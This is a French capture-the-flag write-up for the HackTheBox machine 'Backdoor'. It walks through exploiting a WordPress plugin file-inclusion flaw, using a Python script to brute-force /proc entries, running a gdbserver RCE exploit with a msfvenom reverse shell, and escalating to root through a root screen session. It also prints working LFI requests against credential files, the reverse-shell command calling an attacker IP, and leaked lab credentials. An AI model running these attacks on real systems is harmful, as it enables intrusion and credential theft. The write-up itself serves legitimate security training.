Backdoor HackTheBox (Writeup)

Skills:

WordPress Local File Inclusion Vulnerability (LFI)
LFI to RCE (Abusing /proc/PID/cmdline)
Gdbserver RCE Vulnerability
Abusing Screen (Privilege Escalation) [Session synchronization]

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn --min-rate 5000 10.10.11.125 -oG allPorts

Analyse des ports ouverts avec extractPorts:

Utilisation de la fonction extractPorts pour afficher de manière synthétique les ports ouverts et les copier dans le clipboard (22,80,1337)

Scan de la version des ports avec Nmap:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80,1337 10.10.11.125 -oN targeted

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP

Port 80 - WordPress

Identification de WordPress :

Avec l'outil WhatWeb, le service sur le port 80 est identifié comme étant WordPress.

Énumeration des utilisateurs :

Un utilisateur valide (admin) est découvert via une attaque de force brute :

wpscan --url http://backdoor.htb/ -e u

Énumération des répertoires avec Gobuster :

Recherche des répertoires :

gobuster dir -u http://backdoor.htb/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100

Vulnérabilité Ebook-Download - LFI

Recherche dans wp-content/plugins pour découvrir les plugins actifs :

/wp-content/plugins

Le plugin ebook-download présente une vulnérabilité LFI exploitée via :

/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

Cette requête permet de télécharger des fichiers arbitraires. En récupérant le fichier wp-config.php

On obtient les informations suivantes :

wordpressuser
MQYBJSaD#DxG6qbm

Ces informations ne permettent pas de se connecter à l’interface wp-admin,

Exploitation LFI

Énumération des fichiers sensibles :

Lister les utilisateurs système via /etc/passwd :

http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/

Tentatives de récupération de la clé SSH privée de l'utilisateur user :

curl -s -X GET "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/home/user/.ssh/id_rsa"
curl -s -X GET "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/home/user/.ssh/id_rsa.pub"

Ces tentatives échouent probablement à cause des permissions restreintes sur ces fichiers.

LFI - Proc

Exploration du proc

Création d’un script Python pour extraire les informations des processus en explorant /proc/[PID]/cmdline :

#!/usr/bin/python3


from pwn import *
import requests, signal, time, pdb

def def_handler(sig, frame):

    print("\n\n[+]] Exiting...\n")
    sys.exit(1)

# Ctrl + c 

signal.signal(signal.SIGINT, def_handler)

# Global Variables 
main_url = "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="


def makeRequest():
    # /proc/PID/cmdline
    p1 = log.progress("Brute Force Attack")
    p1.status("Starting Brute Force Attack")
    sleep(2)

    for i in range(1, 1000):
        p1.status("Trying with PATH /proc/%s/cmdline" % str(i))
        url = main_url + "/proc/" + str(i) + "/cmdline"
        r = requests.get(url)

        if len(r.content) > 82:
            print("-------------------------------------------------------------------------------------")
            log.info("PATH: /proc/%s/cmdline" % str(i))
            log.info("Total length: %s" %len(r.content))
            print(r.content)
            print("-------------------------------------------------------------------------------------")

if __name__ == '__main__':
    makeRequest()

En analysant les processus, le port 1337 est identifié comme un serveur gdbserver.

Port 1337 - gdbserver

Un exploit pour gdbserver est disponible sur Searchsploit :

Exploitation de gdbserver :

searchsploit -m linux/remote/50539.py

Générer un shell inversé :

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.7 LPORT=443 PrependFork=true -o rev.bin

Démarrer un listener sur le port 443 :

nc -nvlp 443

Exécuter l’exploit :

python3 exploit.py 10.10.11.125:1337 rev.bin

Traiter le shell interactif pour plus de stabilité :

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Flag User.txt :)

Élévation de privilèges

SUID - Screen:

Identification du binaire SUID

Nous allons chercher les fichiers ayant le bit SUID activé sur le système en utilisant la commande suivante :

find / -perm -4000 2>/dev/null

Analyse des processus Screen

Pour examiner les processus liés à Screen en cours d'exécution, nous utilisons la commande suivante :

ps -aux | grep "screen"

Nous trouvons le processus suivant en cours d'exécution :

/bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done

Le processus ci-dessus montre que Screen est configuré pour créer une session root si le dossier /var/run/screen/S-root/ est vide. Grâce à cette configuration, nous pouvons exploiter Screen pour obtenir un accès root.

screen -x root/

Flag root.txt :)

Après avoir accédé à la session Screen en tant que root, vous avez désormais les privilèges administrateur.

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?